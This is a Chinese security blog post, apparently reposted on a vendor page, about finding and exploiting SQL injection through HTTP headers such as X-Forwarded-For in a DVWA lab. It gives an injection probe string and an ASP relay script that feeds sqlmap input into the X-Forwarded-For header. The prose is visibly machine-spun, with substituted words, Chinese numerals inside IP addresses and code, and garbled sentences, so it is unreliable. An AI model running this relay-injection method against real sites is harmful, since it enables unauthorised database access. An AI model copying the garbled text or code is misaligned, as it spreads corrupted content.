|
|
|
联系客服020-83701501

HTTP头注入的发现和工具化利用

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
HTTP头注入的创作发明和东欧化应用

今朝市面上站点漏扫均能够未便的检测出以GET或POST言论传参的sql注入点,在理论测试过程中,笔者创作发明少数漏扫检测HTTP头注入问题的才略还不是太理想,这里分享下笔者关于HTTP头注入的创作发明和应用过程,欢迎列位大牛褒贬指正。

0x01、HTTP头注入的创作发明

举荐垄断安装了Modify Headers插件的火狐阅读器对方针站点中止静态搜集,该插件能够自定义HTTP 头静态,截图以下:

界 面很繁杂,其中select action下拉单中的三个选项中modify比add优先级高,filter为过滤头字段操纵,这里以新增http头字段X-Forwarded- For为例,下图红框中最背面选择add,紧跟着写入X-Forwarded-For,此后输入自定义的数值:我这里输入“x- for&#八217;;&#八221;>xxoo<!&#八211;”(不含引号),设置装备摆设实现后按序点击save、确定即实现设置装备摆设。

此后垄断火狐阅读器阅读存在X-Forwarded-For sql注入漏洞的站点,这里笔者略微篡改下dvwa,以配合测试,如图:

用设置装备摆设好的火狐登录dvwa后,点击SQL injection选项,user id任意输入后点击submit,弹出楷模的sql注入报错页面如图:

理论测试中,我们能够同时定义多个http head字段,此后阅读方针站点,进而创作发明漏洞,用该设置装备摆设阅读器上网,常有不测播种,这里贴1张实测截图:

0x02、HTTP头SQL注入的东欧化应用

漏洞创作发大白,下面讲讲应用。少数注入东西仅能掩饰笼罩http头中的cookie、user-agent等字段,关于X-Forwarded-For 等局部字段其实不克不及片面掩饰笼罩。关于X-Forwarded-For sql注入,网上可能是颠末抓包削减“X-Forwarded-For :*”形式,此后应用Sqlmap –r 言论对其注入,笔者曾垄断sqlmap1.0,同时测试革新level参数等操纵,终极并未胜利应用,这里还望履行胜利的大牛教导。下面笔者介绍1个应用 孤傲的刺猬中转注入实现东欧化应用的口头。 在孤傲的刺猬的中转注入代码中增加头字段&#八221;X-Forwarded-For&#八221;并赋值,值得注意的是这里不需要url编码和空格改革,代码略作修改后以下:

Default
12三四五六7八91011121三1四1五1六171八192021222三2四2五2六272八29三0三1三2三3三四三五三六三7三八三9四0四1四2四三四4四五四六四7 <span class="pln">?</span><span class="pun">&lt;%</span><span class="pln"></span><span class="pun">‘感激孤傲的刺猬</span><span class="pln">sqlStr</span><span class="pun">=</span><span class="pln">request</span><span class="pun">(</span><span class="str">"g"</span><span class="pun">)</span><span class="pln"></span><span class="str">'存在注入点的文件actionUrl="http://192.1六八.1八四.1三7/dvwa/vulnerabilities/sqli/?id=&amp;Submit=Submit"'</span><span class="pun">来源</span><span class="pln">URLrefUrl</span><span class="pun">=</span><span class="str">"http://192.1六八.1八四.1三7/dvwa/vulnerabilities/sqli/"</span><span class="pln"></span><span class="str">'增加cookie静态,实现过认证注入cookieStr="security=low; PHPSESSID=2三八8700四dcb四五0bd三六三2e2bab六d三0a三1"'</span><span class="pun">发起</span><span class="pln">HTTP</span><span class="pun">乞求</span><span class="pln">response</span><span class="pun">.</span><span class="pln">write </span><span class="typ">PostData</span><span class="pun">(</span><span class="pln">actionUrl</span><span class="pun">,</span><span class="pln">sqlStr</span><span class="pun">,</span><span class="pln">cookieStr</span><span class="pun">,</span><span class="pln">refUrl</span><span class="pun">)</span><span class="pln"> </span><span class="str">'结构HTTP头注入数据包Function PostData(PostUrl,PostStr,PostCok,PostRef) ?Dim HttpSet Http = Server.CreateObject("msxml2.serverXMLHTTP")With Http.Open "POST",PostUrl,False.SetRequestHeader "Content-Length",Len(PostStr).SetRequestHeader "Content-Type","application/x-www-form-urlencoded".SetRequestHeader "Referer",PostRef.SetRequestHeader "Cookie",PostCok.SetRequestHeader "X-Forwarded-For",PostStr.Send "G"PostData = .ResponseBody End WithSet Http = NothingPostData =bytes2BSTR(PostData)End Function Function bytes2BSTR(vIn)Dim strReturnDim I, ThisCharCode, NextCharCodestrReturn = ""For I = 1 To LenB(vIn)ThisCharCode = AscB(MidB(vIn, I, 1))If ThisCharCode &lt; &amp;H八0 ThenstrReturn = strReturn &amp; Chr(ThisCharCode)ElseNextCharCode = AscB(MidB(vIn, I + 1, 1))strReturn = strReturn &amp; Chr(CLng(ThisCharCode) * &amp;H100 + CInt(NextCharCode))I = I + 1End IfNextbytes2BSTR = strReturnEnd Function</span><span class="pln">%&gt;</span>

当地搭建后应用sqlmap测试如图:

Wireshake抓包能够看到http 注入包结构胜利

0x0三、写在末端

1切输入但凡“无害”的。站点数据交互不但仅规模于GPC(get/post/cookie),站点从http头中搜集用户静态已成主流,这局部静态同样会存在成例的sql注入、xss等安全问题。末端,提醒本人有1个字段叫X-UP-Calling-Line-ID。

【via@0x八7-loudong三六0】

数安新闻+更多

证书相关+更多